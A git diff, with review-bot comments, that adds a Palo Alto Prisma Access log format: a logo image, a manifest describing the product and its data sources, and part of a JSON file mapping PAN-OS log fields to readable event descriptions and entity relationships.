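Review bot: Roughly forty of the new `paloalto.PanOS*` fields (the PanOSDestinationDevice*, PanOSSDWAN*, PanOSSourceDevice*, PanOSSourceEDL, PanOSVirtualSystemName and URLCategory entries among them) are declared with `description: ''`, so the field catalogue this file feeds tells an analyst nothing about what they hold; a one-line description per field would close the gap, e.g. for `paloalto.PanOSX-Forwarded-ForIP` `description: Client IP address carried in the X-Forwarded-For header, as reported by PAN-OS`. `paloalto.connection.method` reads "connected to the the Gateway" (doubled "the"). `paloalto.source.private.ip`, `paloalto.PanOSX-Forwarded-ForIP` and `paloalto.PanOSSessionStartTime` are typed `keyword`; if the catalogue supports `ip` and `date` types (this file alone does not show that), typing them that way lets search and detection rules treat them as addresses and timestamps rather than opaque strings. The hyphenated key `paloalto.PanOSX-Forwarded-ForIP` breaks the naming pattern of every other field in the file and will need quoting in most query languages; `paloalto.PanOSXForwardedForIP` would be consistent with its neighbours.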
diff --git a/Palo Alto Networks/paloalto-prima-access/_meta/logo.png b/Palo Alto Networks/paloalto-prima-access/_meta/logo.png new file mode 100644 index 0000000000000000000000000000000000000000..344ec7ecd5bb31a7e641101881f5767a5ecb4a1a GIT binary patch literal 13410 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 literal 0 HcmV?d00001 diff --git a/Palo Alto Networks/paloalto-prima-access/_meta/manifest.yml b/Palo Alto Networks/paloalto-prima-access/_meta/manifest.yml new file mode 100644 index 000000000..aefbc2559 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/_meta/manifest.yml 
@@ -0,0 +1,12 @@
+uuid: ea265b9d-fb48-4e92-9c26-dcfbf937b630
+name: Palo Alto Prisma access
+slug: paloalto-prisma-access
+description: >-
+ Palo Alto Prisma Access is a cloud-delivered security platform that provides secure access to applications and data, using a scalable network to protect users and devices across all locations. It integrates advanced threat prevention and access controls to ensure consistent security policies.
+
+ Sending Palo Alto logs to Sekoia.io allows to discover potential network security threats.
+data_sources:
+ Network protocol analysis: Prisma access can monitor network traffic
+ Authentication logs: Prisma Access monitor authentications to resources
+ Web logs: Prisma Access monitor and logs HTTP requests
+ Web application firewall logs: Prisma Access monitor and logs network traffic
diff --git a/Palo Alto Networks/paloalto-prima-access/_meta/smart-descriptions.json b/Palo Alto Networks/paloalto-prima-access/_meta/smart-descriptions.json
new file mode 100644
index 000000000..44dfb75d1
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/_meta/smart-descriptions.json
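Review bot: The manifest declares `slug: paloalto-prisma-access` and `name: Palo Alto Prisma access`, yet every file in this commit lives under `Palo Alto Networks/paloalto-prima-access/` ("prima", not "prisma"); if the directory name is used anywhere to locate a format by its slug the two will not match, and either way the typo is carried into every later path reference to the format. Renaming the directory to `paloalto-prisma-access` before the format ships is cheaper than doing it once other files point at it. The description's `allows to discover` reads better as `makes it possible to discover`, and the `data_sources` values use a singular subject with a plural verb (`Prisma Access monitor …`) where `monitors` is meant.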
@@ -0,0 +1,721 @@ +[ + { + "value": "{event.reason}", + "conditions": [ + { + "field": "event.reason" + } + ] + }, + { + "value": "Connection from {source.ip} to host {host.name} {destination.ip}:{destination.port} matched the rule {rule.name}", + "conditions": [ + { + "field": "log.logger", + "value": "traffic" + }, + { + "field": "host.name" + }, + { + "field": "source.ip" + }, + { + "field": "destination.ip" + }, + { + "field": "destination.port" + }, + { + "field": "rule.name" + } + ], + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "connected to" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "connected from" + }, + { + "source": "destination.ip", + "target": "host.name", + "type": "associated with" + }, + { + "source": "process.name", + "target": "source.ip", + "type": "running on" + } + ] + }, + { + "value": "{user.name} from {source.ip} was classified as {paloalto.PanOSQuarantineReason} because of {event.reason}", + "conditions": [ + { + "field": "log.logger", + "value": "globalprotect" + }, + { + "field": "user.name" + }, + { + "field": "source.ip" + }, + { + "field": "paloalto.PanOSQuarantineReason" + }, + { + "field": "event.reason" + } + ], + "relationships": [ + { + "source": "user.name", + "target": "source.ip", + "type": "connected from" + } + ] + }, + { + "value": "{action.type}:{event.type} for {user.name} from {source.ip}", + "conditions": [ + { + "field": "log.logger", + "value": "userid" + }, + { + "field": "action.type", + "value": "login" + }, + { + "field": "user.name" + }, + { + "field": "source.ip" + } + ], + "relationships": [ + { + "source": "user.name", + "target": "source.ip", + "type": "login from" + } + ] + }, + { + "value": "{action.type}:{event.type} for {user.name} from {source.ip}", + "conditions": [ + { + "field": "log.logger", + "value": "userid" + }, + { + "field": "action.type", + "value": "logout" + }, + { + "field": "user.name" + }, + { + "field": "source.ip" + 
} + ], + "relationships": [ + { + "source": "user.name", + "target": "source.ip", + "type": "logout from" + } + ] + }, + { + "value": "{event.action} threat between {source.ip} and {destination.ip}", + "conditions": [ + { + "field": "log.logger", + "value": "threat" + }, + { + "field": "source.ip" + }, + { + "field": "destination.ip" + } + ], + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "connected to" + } + ] + }, + { + "value": "{event.action} threat between {source.nat.ip} and {destination.nat.ip}", + "conditions": [ + { + "field": "log.logger", + "value": "threat" + }, + { + "field": "source.nat.ip" + }, + { + "field": "destination.nat.ip" + } + ], + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "connected to" + } + ] + }, + { + "value": "{log.logger} type {paloalto.PanOSThreatID} detected from {source.ip} user {user.name} to {destination.ip}:{destination.port} targeting host {host.name}", + "conditions": [ + { + "field": "log.logger", + "value": "threat" + }, + { + "field": "paloalto.PanOSThreatID" + }, + { + "field": "source.ip" + }, + { + "field": "host.name" + }, + { + "field": "user.name" + }, + { + "field": "destination.ip" + }, + { + "field": "destination.port" + } + ], + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "connected to" + } + ] + }, + { + "value": "Session denied between {source.ip}:{source.port} and {destination.ip}:{destination.port}", + "conditions": [ + { + "field": "log.logger", + "value": "traffic" + }, + { + "field": "action.type", + "value": "deny" + }, + { + "field": "network.transport", + "value": "udp" + } + ], + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "was denied a connection to" + } + ] + }, + { + "value": "{network.transport} traffic from {source.ip} to {destination.ip} ({host.name}).", + "conditions": [ + { + "field": "log.logger", + "value": "traffic" + 
}, + { + "field": "network.transport", + "value": "icmp" + }, + { + "field": "source.ip" + }, + { + "field": "destination.ip" + }, + { + "field": "host.name" + } + ], + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "ICMP traffic to" + } + ] + }, + { + "value": "Session dropped between {source.ip}:{source.port} and {destination.ip}:{destination.port}", + "conditions": [ + { + "field": "log.logger", + "value": "traffic" + }, + { + "field": "action.type", + "value": "drop" + }, + { + "field": "network.transport", + "value": "udp" + } + ], + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "was denied a connection to" + } + ] + }, + { + "value": "Session ended between {source.ip}:{source.port} and {destination.ip}:{destination.port}", + "conditions": [ + { + "field": "log.logger", + "value": "traffic" + }, + { + "field": "action.type", + "value": "end" + }, + { + "field": "network.transport", + "value": "udp" + } + ], + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "connected to" + } + ] + }, + { + "value": "Session started between {source.ip}:{source.port} and {destination.ip}:{destination.port}", + "conditions": [ + { + "field": "log.logger", + "value": "traffic" + }, + { + "field": "action.type", + "value": "start" + }, + { + "field": "network.transport", + "value": "udp" + } + ], + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "connected to" + } + ] + }, + { + "value": "Session denied between {source.ip}:{source.port} and {destination.ip}:{destination.port}", + "conditions": [ + { + "field": "log.logger", + "value": "traffic" + }, + { + "field": "action.type", + "value": "deny" + }, + { + "field": "network.transport", + "value": "tcp" + } + ], + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "was denied a connection to" + } + ] + }, + { + "value": "Session 
dropped between {source.ip}:{source.port} and {destination.ip}:{destination.port}", + "conditions": [ + { + "field": "log.logger", + "value": "traffic" + }, + { + "field": "action.type", + "value": "drop" + }, + { + "field": "network.transport", + "value": "tcp" + } + ], + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "was denied a connection to" + } + ] + }, + { + "value": "Session ended between {source.ip}:{source.port} and {destination.ip}:{destination.port}", + "conditions": [ + { + "field": "log.logger", + "value": "traffic" + }, + { + "field": "action.type", + "value": "end" + }, + { + "field": "network.transport", + "value": "tcp" + } + ], + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "connected to" + } + ] + }, + { + "value": "Session started between {source.ip}:{source.port} and {destination.ip}:{destination.port}", + "conditions": [ + { + "field": "log.logger", + "value": "traffic" + }, + { + "field": "action.type", + "value": "start" + }, + { + "field": "network.transport", + "value": "tcp" + } + ], + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "connected to" + } + ] + }, + { + "value": "Session denied between {source.ip} and {destination.ip}", + "conditions": [ + { + "field": "log.logger", + "value": "traffic" + }, + { + "field": "action.type", + "value": "deny" + } + ], + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "was denied a connection to" + } + ] + }, + { + "value": "Session dropped between {source.ip} and {destination.ip}", + "conditions": [ + { + "field": "log.logger", + "value": "traffic" + }, + { + "field": "action.type", + "value": "drop" + } + ], + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "was denied a connection to" + } + ] + }, + { + "value": "Session ended between {source.ip} and {destination.ip}", + "conditions": [ + { + 
